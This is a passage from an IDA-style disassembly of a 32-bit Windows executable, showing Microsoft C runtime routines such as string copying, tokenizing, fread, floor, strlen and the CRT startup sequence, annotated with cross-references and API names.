; ---------------------------------------------------------------------------

loc_403E97:				; CODE XREF: sub_403DE0+7Fj
		lea	eax, [edx-4]
		pop	esi
		pop	edi
		pop	ebx
		retn
sub_403DE0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403EA0	proc near		; CODE XREF: sub_4182F6+104p
					; sub_4184BD+D9p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_8]
		push	edi
		test	ecx, ecx
		jz	loc_403F3F
		push	esi
		push	ebx
		mov	ebx, ecx
		mov	esi, [esp+0Ch+arg_4]
		test	esi, 3
		mov	edi, [esp+0Ch+arg_0]
		jnz	short loc_403ECC
		shr	ecx, 2
		jnz	loc_403F4F
		jmp	short loc_403EF3
; ---------------------------------------------------------------------------

loc_403ECC:				; CODE XREF: sub_403EA0+1Fj
					; sub_403EA0+45j
		mov	al, [esi]
		add	esi, 1
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jz	short loc_403F06
		test	al, al
		jz	short loc_403F0E
		test	esi, 3
		jnz	short loc_403ECC
		mov	ebx, ecx
		shr	ecx, 2
		jnz	short loc_403F4F

loc_403EEE:				; CODE XREF: sub_403EA0+ADj
		and	ebx, 3
		jz	short loc_403F06

loc_403EF3:				; CODE XREF: sub_403EA0+2Aj
					; sub_403EA0+64j
		mov	al, [esi]
		add	esi, 1
		mov	[edi], al
		add	edi, 1
		test	al, al
		jz	short loc_403F38
		sub	ebx, 1
		jnz	short loc_403EF3

loc_403F06:				; CODE XREF: sub_403EA0+39j
					; sub_403EA0+51j
		mov	eax, [esp+0Ch+arg_0]
		pop	ebx
		pop	esi
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403F0E:				; CODE XREF: sub_403EA0+3Dj
		test	edi, 3
		jz	short loc_403F2C

loc_403F16:				; CODE XREF: sub_403EA0+8Aj
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jz	loc_403FBC
		test	edi, 3
		jnz	short loc_403F16

loc_403F2C:				; CODE XREF: sub_403EA0+74j
		mov	ebx, ecx
		shr	ecx, 2
		jnz	short loc_403FA7

loc_403F33:				; CODE XREF: sub_403EA0+9Bj
					; sub_403EA0+116j
		mov	[edi], al
		add	edi, 1

loc_403F38:				; CODE XREF: sub_403EA0+5Fj
		sub	ebx, 1
		jnz	short loc_403F33
		pop	ebx
		pop	esi

loc_403F3F:				; CODE XREF: sub_403EA0+7j
		mov	eax, [esp+4+arg_0]
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403F45:				; CODE XREF: sub_403EA0+C7j
					; sub_403EA0+DFj
		mov	[edi], edx
		add	edi, 4
		sub	ecx, 1
		jz	short loc_403EEE

loc_403F4F:				; CODE XREF: sub_403EA0+24j
					; sub_403EA0+4Cj
		mov	edx, 7EFEFEFFh
		mov	eax, [esi]
		add	edx, eax
		xor	eax, 0FFFFFFFFh
		xor	eax, edx
		mov	edx, [esi]
		add	esi, 4
		test	eax, 81010100h
		jz	short loc_403F45
		test	dl, dl
		jz	short loc_403F99
		test	dh, dh
		jz	short loc_403F8F
		test	edx, 0FF0000h
		jz	short loc_403F85
		test	edx, 0FF000000h
		jnz	short loc_403F45
		mov	[edi], edx
		jmp	short loc_403F9D
; ---------------------------------------------------------------------------

loc_403F85:				; CODE XREF: sub_403EA0+D7j
		and	edx, 0FFFFh
		mov	[edi], edx
		jmp	short loc_403F9D
; ---------------------------------------------------------------------------

loc_403F8F:				; CODE XREF: sub_403EA0+CFj
		and	edx, 0FFh
		mov	[edi], edx
		jmp	short loc_403F9D
; ---------------------------------------------------------------------------

loc_403F99:				; CODE XREF: sub_403EA0+CBj
		xor	edx, edx
		mov	[edi], edx

loc_403F9D:				; CODE XREF: sub_403EA0+E3j
					; sub_403EA0+EDj ...
		add	edi, 4
		xor	eax, eax
		sub	ecx, 1
		jz	short loc_403FB3

loc_403FA7:				; CODE XREF: sub_403EA0+91j
		xor	eax, eax

loc_403FA9:				; CODE XREF: sub_403EA0+111j
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 1
		jnz	short loc_403FA9

loc_403FB3:				; CODE XREF: sub_403EA0+105j
		and	ebx, 3
		jnz	loc_403F33

loc_403FBC:				; CODE XREF: sub_403EA0+7Ej
		mov	eax, [esp+0Ch+arg_0]
		pop	ebx
		pop	esi
		pop	edi
		retn
sub_403EA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403FC4	proc near		; CODE XREF: sub_4182F6+1Dp
					; sub_4182F6+5Ap ...

var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= byte ptr -24h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		mov	[ebp+var_2C], eax
		call	sub_40595D
		push	8
		pop	ecx
		mov	[ebp+var_28], eax
		xor	eax, eax
		lea	edi, [ebp+var_24]
		push	7
		rep stosd
		pop	edi

loc_403FF5:				; CODE XREF: sub_403FC4+4Aj
		mov	dl, [esi]
		movzx	ecx, dl
		mov	eax, ecx
		and	ecx, edi
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+var_24]
		or	[eax], bl
		inc	esi
		test	dl, dl
		jnz	short loc_403FF5
		mov	edx, [ebp+var_2C]
		test	edx, edx
		jnz	short loc_404024
		mov	eax, [ebp+var_28]
		mov	edx, [eax+18h]
		jmp	short loc_404024
; ---------------------------------------------------------------------------

loc_40401F:				; CODE XREF: sub_403FC4+77j
		test	al, al
		jz	short loc_40403D
		inc	edx

loc_404024:				; CODE XREF: sub_403FC4+51j
					; sub_403FC4+59j
		mov	al, [edx]
		movzx	esi, al
		xor	ebx, ebx
		mov	ecx, esi
		and	ecx, edi
		inc	ebx
		shl	ebx, cl
		shr	esi, 3
		mov	cl, [ebp+esi+var_24]
		test	bl, cl
		jnz	short loc_40401F

loc_40403D:				; CODE XREF: sub_403FC4+5Dj
		mov	ebx, edx
		jmp	short loc_404059
; ---------------------------------------------------------------------------

loc_404041:				; CODE XREF: sub_403FC4+98j
		movzx	esi, byte ptr [edx]
		xor	eax, eax
		mov	ecx, esi
		and	ecx, edi
		inc	eax
		shl	eax, cl
		shr	esi, 3
		mov	cl, [ebp+esi+var_24]
		test	al, cl
		jnz	short loc_404060
		inc	edx

loc_404059:				; CODE XREF: sub_403FC4+7Bj
		cmp	byte ptr [edx],	0
		jnz	short loc_404041
		jmp	short loc_404064
; ---------------------------------------------------------------------------

loc_404060:				; CODE XREF: sub_403FC4+92j
		mov	byte ptr [edx],	0
		inc	edx

loc_404064:				; CODE XREF: sub_403FC4+9Aj
		mov	eax, [ebp+var_28]
		mov	ecx, [ebp+var_4]
		mov	[eax+18h], edx
		mov	eax, ebx
		sub	eax, edx
		neg	eax
		sbb	eax, eax
		pop	edi
		and	eax, ebx
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_403FC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_404083	proc near		; CODE XREF: sub_41BD4E+70p
					; sub_41BD4E+160p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_4040AA
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_4040AA:				; CODE XREF: sub_404083+9j
		mov	eax, [eax+0Ch]
		and	eax, 10h
		pop	esi
		retn
sub_404083	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4040B2	proc near		; CODE XREF: sub_404248+A1p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_8]
		test	edi, edi
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_4], eax
		jz	loc_404202
		cmp	[ebp+arg_C], 0
		jz	loc_404202
		imul	edi, [ebp+arg_C]
		mov	esi, [ebp+arg_10]
		test	word ptr [esi+0Ch], 10Ch
		mov	[ebp+var_10], edi
		mov	ebx, edi
		jz	short loc_4040F8
		mov	eax, [esi+18h]
		mov	[ebp+var_C], eax
		jmp	short loc_4040FF
; ---------------------------------------------------------------------------

loc_4040F8:				; CODE XREF: sub_4040B2+3Cj
		mov	[ebp+var_C], 1000h

loc_4040FF:				; CODE XREF: sub_4040B2+44j
		test	edi, edi
		jz	loc_4041CE

loc_404107:				; CODE XREF: sub_4040B2+116j
		test	word ptr [esi+0Ch], 10Ch
		jz	short loc_404150
		mov	eax, [esi+4]
		test	eax, eax
		jz	short loc_404150
		jl	loc_404233
		cmp	ebx, eax
		mov	edi, ebx
		jb	short loc_404124
		mov	edi, eax

loc_404124:				; CODE XREF: sub_4040B2+6Ej
		cmp	edi, [ebp+var_4]
		ja	loc_4041D3
		push	edi
		push	dword ptr [esi]
		push	[ebp+var_4]
		push	[ebp+var_8]
		call	sub_403500
		sub	[esi+4], edi
		add	[esi], edi
		add	[ebp+var_8], edi
		sub	ebx, edi
		add	esp, 10h
		sub	[ebp+var_4], edi
		mov	edi, [ebp+var_10]
		jmp	short loc_4041C6
; ---------------------------------------------------------------------------

loc_404150:				; CODE XREF: sub_4040B2+5Bj
					; sub_4040B2+62j
		cmp	ebx, [ebp+var_C]
		jb	short loc_40419E
		cmp	[ebp+var_C], 0
		mov	eax, ebx
		jz	short loc_404166
		xor	edx, edx
		div	[ebp+var_C]
		mov	eax, ebx
		sub	eax, edx

loc_404166:				; CODE XREF: sub_4040B2+A9j
		cmp	eax, [ebp+var_4]
		ja	loc_404209
		push	eax
		push	[ebp+var_8]
		push	esi
		call	sub_408FE0
		pop	ecx
		push	eax
		call	sub_40A90F
		add	esp, 0Ch
		test	eax, eax
		jz	loc_404242
		cmp	eax, 0FFFFFFFFh
		jz	loc_404233
		add	[ebp+var_8], eax
		sub	ebx, eax
		sub	[ebp+var_4], eax
		jmp	short loc_4041C6
; ---------------------------------------------------------------------------

loc_40419E:				; CODE XREF: sub_4040B2+A1j
		push	esi
		call	sub_40A24D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	loc_404237
		cmp	[ebp+var_4], 0
		jz	short loc_404209
		mov	ecx, [ebp+var_8]
		inc	[ebp+var_8]
		mov	[ecx], al
		mov	eax, [esi+18h]
		dec	ebx
		dec	[ebp+var_4]
		mov	[ebp+var_C], eax

loc_4041C6:				; CODE XREF: sub_4040B2+9Cj
					; sub_4040B2+EAj
		test	ebx, ebx
		jnz	loc_404107

loc_4041CE:				; CODE XREF: sub_4040B2+4Fj
		mov	eax, [ebp+arg_C]
		jmp	short loc_404204
; ---------------------------------------------------------------------------

loc_4041D3:				; CODE XREF: sub_4040B2+75j
		xor	esi, esi
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_4041EA
		push	[ebp+arg_4]
		push	esi
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch

loc_4041EA:				; CODE XREF: sub_4040B2+127j
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 22h
		push	esi

loc_4041FA:				; CODE XREF: sub_4040B2+17Fj
		call	sub_4034C7
		add	esp, 14h

loc_404202:				; CODE XREF: sub_4040B2+1Aj
					; sub_4040B2+24j
		xor	eax, eax

loc_404204:				; CODE XREF: sub_4040B2+11Fj
					; sub_4040B2+18Ej
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_404209:				; CODE XREF: sub_4040B2+B7j
					; sub_4040B2+100j
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_40421F
		push	[ebp+arg_4]
		push	0
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch

loc_40421F:				; CODE XREF: sub_4040B2+15Bj
		call	sub_405D93
		mov	dword ptr [eax], 22h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		jmp	short loc_4041FA
; ---------------------------------------------------------------------------

loc_404233:				; CODE XREF: sub_4040B2+64j
					; sub_4040B2+DCj
		or	dword ptr [esi+0Ch], 20h

loc_404237:				; CODE XREF: sub_4040B2+F6j
					; sub_4040B2+194j
		mov	eax, edi
		sub	eax, ebx
		xor	edx, edx
		div	[ebp+arg_8]
		jmp	short loc_404204
; ---------------------------------------------------------------------------

loc_404242:				; CODE XREF: sub_4040B2+D3j
		or	dword ptr [esi+0Ch], 10h
		jmp	short loc_404237
sub_4040B2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404248	proc near		; CODE XREF: sub_40430F+12p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	0Ch
		push	offset dword_422938
		call	__SEH_prolog4
		xor	esi, esi
		mov	[ebp+var_1C], esi
		mov	ebx, [ebp+arg_8]
		cmp	ebx, esi
		jz	short loc_40428B
		mov	edi, [ebp+arg_C]
		cmp	edi, esi
		jz	short loc_40428B
		xor	eax, eax
		cmp	[ebp+arg_0], esi
		setnz	al
		cmp	eax, esi
		jnz	short loc_404293

loc_404273:				; CODE XREF: sub_404248+7Aj
					; sub_404248+88j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4034C7
		add	esp, 14h

loc_40428B:				; CODE XREF: sub_404248+16j
					; sub_404248+1Dj
		xor	eax, eax

loc_40428D:				; CODE XREF: sub_404248+BBj
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_404293:				; CODE XREF: sub_404248+29j
		cmp	[ebp+arg_10], esi
		jz	short loc_4042A3
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ebx
		cmp	edi, eax
		jbe	short loc_4042D2

loc_4042A3:				; CODE XREF: sub_404248+4Ej
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_4042B8
		push	[ebp+arg_4]
		push	esi
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch

loc_4042B8:				; CODE XREF: sub_404248+5Fj
		xor	eax, eax
		cmp	[ebp+arg_10], esi
		setnz	al
		cmp	eax, esi
		jz	short loc_404273
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ebx
		cmp	eax, edi
		sbb	eax, eax
		inc	eax
		jz	short loc_404273

loc_4042D2:				; CODE XREF: sub_404248+59j
		push	[ebp+arg_10]
		call	sub_40871B
		pop	ecx
		mov	[ebp+ms_exc.disabled], esi
		push	[ebp+arg_10]
		push	edi
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_4040B2
		add	esp, 14h
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_404305
		mov	eax, [ebp+var_1C]
		jmp	short loc_40428D
sub_404248	endp


; =============== S U B	R O U T	I N E =======================================



sub_404305	proc near		; CODE XREF: sub_404248+B3p
					; DATA XREF: zcrshv4o:00422950o
		push	dword ptr [ebp+18h]
		call	sub_40876D
		pop	ecx
		retn
sub_404305	endp


; =============== S U B	R O U T	I N E =======================================



sub_40430F	proc near		; CODE XREF: sub_41BD4E+D6p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	[esp+arg_C]
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	0FFFFFFFFh
		push	[esp+10h+arg_0]
		call	sub_404248
		add	esp, 14h
		retn
sub_40430F	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404330	proc near		; CODE XREF: sub_414954+1A7p
					; sub_414954+1DCp ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	edi, [ebp+arg_0]
		mov	edx, edi
		mov	esi, edi
		xor	eax, eax
		or	ecx, 0FFFFFFFFh
		repne scasb
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_40435F
		sub	edi, 2

loc_40434B:				; CODE XREF: sub_404330+2Dj
		cmp	esi, edi
		jnb	short loc_40435F
		mov	ah, [esi]
		mov	al, [edi]
		mov	[esi], al
		mov	[edi], ah
		add	esi, 1
		sub	edi, 1
		jmp	short loc_40434B
; ---------------------------------------------------------------------------

loc_40435F:				; CODE XREF: sub_404330+16j
					; sub_404330+1Dj
		mov	eax, edx
		pop	esi
		pop	edi
		leave
		retn
sub_404330	endp


; =============== S U B	R O U T	I N E =======================================



sub_404365	proc near		; CODE XREF: sub_404376j
					; sub_410870+35p

arg_0		= dword	ptr  4

		push	0Ah
		push	0
		push	[esp+8+arg_0]
		call	sub_40AC16
		add	esp, 0Ch
		retn
sub_404365	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_404376	proc near		; CODE XREF: sub_401EF9+9Dp
					; sub_401EF9+ACp ...
		jmp	sub_404365
sub_404376	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_404380	proc near		; CODE XREF: sub_41B3E7+513p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= qword	ptr  4

		cmp	dword_437E98, 0
		jz	sub_40AF03
		sub	esp, 8
		stmxcsr	[esp+8+var_4]
		mov	eax, [esp+8+var_4]
		and	eax, 1F80h
		cmp	eax, 1F80h
		jnz	short loc_4043B4
		fnstcw	word ptr [esp+8+var_8]
		mov	ax, word ptr [esp+8+var_8]
		and	ax, 7Fh
		cmp	ax, 7Fh

loc_4043B4:				; CODE XREF: sub_404380+23j
		lea	esp, [esp+8]
		jnz	sub_40AF03
		jmp	short $+2
		movq	xmm0, [esp+arg_0]
		movapd	xmm2, oword ptr	ds:oword_41E3C0
		movapd	xmm1, xmm0
		movapd	xmm7, xmm0
		psrlq	xmm0, 34h
		movd	eax, xmm0
		andpd	xmm0, oword ptr	ds:oword_41E3E0
		psubd	xmm2, xmm0
		psrlq	xmm1, xmm2
		test	eax, 800h
		jz	short loc_404442
		cmp	eax, 0BFFh
		jl	short loc_40447A
		psllq	xmm1, xmm2
		cmp	eax, 0C32h
		jg	short loc_404413
		movq	[esp+arg_0], xmm1
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_404413:				; CODE XREF: sub_404380+86j
					; sub_404380+E1j
		ucomisd	xmm7, xmm7
		jnp	short loc_40443D
		mov	edx, 3ECh
		sub	esp, 10h
		mov	[esp+10h+var_4], edx
		mov	edx, esp
		add	edx, 14h
		mov	[esp+10h+var_8], edx
		mov	[esp+10h+var_C], edx
		mov	[esp+10h+var_10], edx
		call	sub_40AC3F
		add	esp, 10h

loc_40443D:				; CODE XREF: sub_404380+97j
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_404442:				; CODE XREF: sub_404380+74j
		movq	xmm0, [esp+arg_0]
		psllq	xmm1, xmm2
		movapd	xmm3, xmm0
		cmppd	xmm0, xmm1, 6
		cmp	eax, 3FFh
		jl	short loc_404481
		cmp	eax, 432h
		jg	short loc_404413
		andpd	xmm0, oword ptr	ds:oword_41E3B0
		addsd	xmm1, xmm0
		movq	[esp+arg_0], xmm1
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_40447A:				; CODE XREF: sub_404380+7Bj
		fld	ds:dbl_41E3F0
		retn
; ---------------------------------------------------------------------------

loc_404481:				; CODE XREF: sub_404380+DAj
		cmppd	xmm3, oword ptr	ds:oword_41E3D0, 6
		andpd	xmm3, oword ptr	ds:oword_41E3B0
		movq	[esp+arg_0], xmm3
		fld	[esp+arg_0]
		retn
sub_404380	endp


; =============== S U B	R O U T	I N E =======================================



sub_40449D	proc near		; CODE XREF: .text:00404542p
					; .text:004045DFp ...

arg_0		= dword	ptr  4

		cmp	dword_4285BC, 1
		jnz	short loc_4044AB
		call	sub_40A214

loc_4044AB:				; CODE XREF: sub_40449D+7j
		push	[esp+arg_0]
		call	sub_40A074
		push	0FFh
		call	sub_407E67
		pop	ecx
		pop	ecx
		retn
sub_40449D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4044C1	proc near		; CODE XREF: .text:004045C7p
		cmp	word ptr ds:400000h, 5A4Dh
		jnz	short loc_4044FF
		mov	eax, ds:40003Ch
		cmp	dword ptr [eax+400000h], 4550h
		jnz	short loc_4044FF
		cmp	word ptr [eax+400018h],	10Bh
		jnz	short loc_4044FF
		cmp	dword ptr [eax+400074h], 0Eh
		jbe	short loc_4044FF
		xor	ecx, ecx
		cmp	[eax+4000E8h], ecx
		setnz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_4044FF:				; CODE XREF: sub_4044C1+9j
					; sub_4044C1+1Aj ...
		xor	eax, eax
		retn
sub_4044C1	endp

; ---------------------------------------------------------------------------

loc_404502:				; CODE XREF: .text:004046E7j
		push	60h
		push	offset dword_422958
		call	__SEH_prolog4
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-70h]
		push	eax
		call	ds:off_41E1A8
		mov	dword ptr [ebp-4], 0FFFFFFFEh
		mov	edi, 94h
		push	edi
		push	0
		mov	ebx, ds:dword_41E0FC
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41E110	; RtlAllocateHeap
		mov	esi, eax
		test	esi, esi
		jnz	short loc_40454D
		push	12h
		call	sub_40449D
		pop	ecx
		jmp	loc_4046D7
; ---------------------------------------------------------------------------

loc_40454D:				; CODE XREF: .text:0040453Ej
		mov	[esi], edi
		push	esi
		call	ds:dword_41E068	; GetVersionExA
		push	esi
		push	0
		test	eax, eax
		jnz	short loc_40456B
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41E108	; RtlFreeHeap
		jmp	loc_4046D7
; ---------------------------------------------------------------------------

loc_40456B:				; CODE XREF: .text:0040455Bj
		mov	eax, [esi+10h]
		mov	[ebp-20h], eax
		mov	eax, [esi+4]
		mov	[ebp-24h], eax
		mov	eax, [esi+8]
		mov	[ebp-28h], eax
		mov	edi, [esi+0Ch]
		and	edi, 7FFFh
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41E108	; RtlFreeHeap
		mov	esi, [ebp-20h]
		cmp	esi, 2
		jz	short loc_40459D
		or	edi, 8000h

loc_40459D:				; CODE XREF: .text:00404595j
		mov	ecx, [ebp-24h]
		mov	eax, ecx
		shl	eax, 8
		mov	edx, [ebp-28h]
		add	eax, edx
		mov	dword_428A98, esi
		mov	dword_428AA0, eax
		mov	dword_428AA4, ecx
		mov	dword_428AA8, edx
		mov	dword_428A9C, edi
		call	sub_4044C1
		mov	[ebp-20h], eax
		xor	ebx, ebx
		inc	ebx
		push	ebx
		call	sub_406043
		pop	ecx
		test	eax, eax
		jnz	short loc_4045E5
		push	1Ch
		call	sub_40449D
		pop	ecx

loc_4045E5:				; CODE XREF: .text:004045DBj
		call	sub_405A96
		test	eax, eax
		jnz	short loc_4045F6
		push	10h
		call	sub_40449D
		pop	ecx

loc_4045F6:				; CODE XREF: .text:004045ECj
		call	sub_40B602
		mov	[ebp-4], ebx
		call	sub_408DA0
		test	eax, eax
		jge	short loc_40460F
		push	1Bh
		call	sub_407E1D
		pop	ecx

loc_40460F:				; CODE XREF: .text:00404605j
		call	ds:off_41E1A4
		mov	dword_439018, eax
		call	sub_40B4CD
		mov	dword_4285B4, eax
		call	sub_40B414
		test	eax, eax
		jge	short loc_404635
		push	8
		call	sub_407E1D
		pop	ecx

loc_404635:				; CODE XREF: .text:0040462Bj
		call	sub_40B1A1
		test	eax, eax
		jge	short loc_404646
		push	9
		call	sub_407E1D
		pop	ecx

loc_404646:				; CODE XREF: .text:0040463Cj
		push	ebx
		call	sub_407F39
		pop	ecx
		test	eax, eax
		jz	short loc_404658
		push	eax
		call	sub_407E1D
		pop	ecx

loc_404658:				; CODE XREF: .text:0040464Fj
		call	sub_40B144
		test	[ebp-44h], bl
		jz	short loc_404668
		movzx	ecx, word ptr [ebp-40h]
		jmp	short loc_40466B
; ---------------------------------------------------------------------------

loc_404668:				; CODE XREF: .text:00404660j
		push	0Ah
		pop	ecx

loc_40466B:				; CODE XREF: .text:00404666j
		push	ecx
		push	eax
		push	0
		push	400000h
		call	sub_41C77E
		mov	[ebp-1Ch], eax
		cmp	dword ptr [ebp-20h], 0
		jnz	short loc_404688
		push	eax
		call	sub_408099

loc_404688:				; CODE XREF: .text:00404680j
		call	sub_4080BB
		jmp	short loc_4046BD
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-2Ch], ecx
		push	eax
		push	ecx
		call	sub_40AFD5
		pop	ecx
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	eax, [ebp-2Ch]
		mov	[ebp-1Ch], eax
		cmp	dword ptr [ebp-20h], 0
		jnz	short loc_4046B8
		push	eax
		call	sub_4080AA

loc_4046B8:				; CODE XREF: .text:004046B0j
		call	sub_4080CA

loc_4046BD:				; CODE XREF: .text:0040468Dj
		mov	dword ptr [ebp-4], 0FFFFFFFEh
		mov	eax, [ebp-1Ch]
		jmp	short loc_4046DC
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	dword ptr [ebp-4], 0FFFFFFFEh

loc_4046D7:				; CODE XREF: .text:00404548j
					; .text:00404566j
		mov	eax, 0FFh

loc_4046DC:				; CODE XREF: .text:004046C7j
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4046E2:				; CODE XREF: k2vbe3.d:loc_4538A1j
		call	sub_40B64A
		jmp	loc_404502
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4046F0	proc near		; CODE XREF: sub_40319A+16p
					; sub_403200+21p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		test	ecx, 3
		jz	short loc_404720

loc_4046FC:				; CODE XREF: sub_4046F0+1Bj
		mov	al, [ecx]
		add	ecx, 1
		test	al, al
		jz	short loc_404753
		test	ecx, 3
		jnz	short loc_4046FC
		add	eax, 0
		lea	esp, [esp+0]
		lea	esp, [esp+0]

loc_404720:				; CODE XREF: sub_4046F0+Aj
					; sub_4046F0+46j ...
		mov	eax, [ecx]
		mov	edx, 7EFEFEFFh
		add	edx, eax
		xor	eax, 0FFFFFFFFh
		xor	eax, edx
		add	ecx, 4
		test	eax, 81010100h
		jz	short loc_404720
		mov	eax, [ecx-4]
		test	al, al
		jz	short loc_404771
		test	ah, ah
		jz	short loc_404767
		test	eax, 0FF0000h
		jz	short loc_40475D
		test	eax, 0FF000000h
		jz	short loc_404753
		jmp	short loc_404720
; ---------------------------------------------------------------------------

loc_404753:				; CODE XREF: sub_4046F0+13j
					; sub_4046F0+5Fj
		lea	eax, [ecx-1]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_40475D:				; CODE XREF: sub_4046F0+58j
		lea	eax, [ecx-2]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_404767:				; CODE XREF: sub_4046F0+51j
		lea	eax, [ecx-3]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_404771:				; CODE XREF: sub_4046F0+4Dj
		lea	eax, [ecx-4]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
sub_4046F0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40477B	proc near		; CODE XREF: sub_40121E+58p
					; sub_40150F+Fp ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, [ebp+arg_0]
		push	esi
		push	edi
		push	8
		pop	ecx
		mov	esi, offset dword_41E3F8
		lea	edi, [ebp+var_20]
		rep movsd
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_4]
		test	eax, eax
		pop	edi
		mov	[ebp+var_4], eax
		pop	esi
		jz	short loc_4047AE
		test	byte ptr [eax],	8
		jz	short loc_4047AE
		mov	[ebp+var_C], 1994000h

loc_4047AE:				; CODE XREF: sub_40477B+25j
					; sub_40477B+2Aj
		lea	eax, [ebp+var_C]
		push	eax
		push	[ebp+var_10]
		push	[ebp+var_1C]
		push	[ebp+var_20]
		call	ds:off_41E1AC
		leave
		retn	8
sub_40477B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


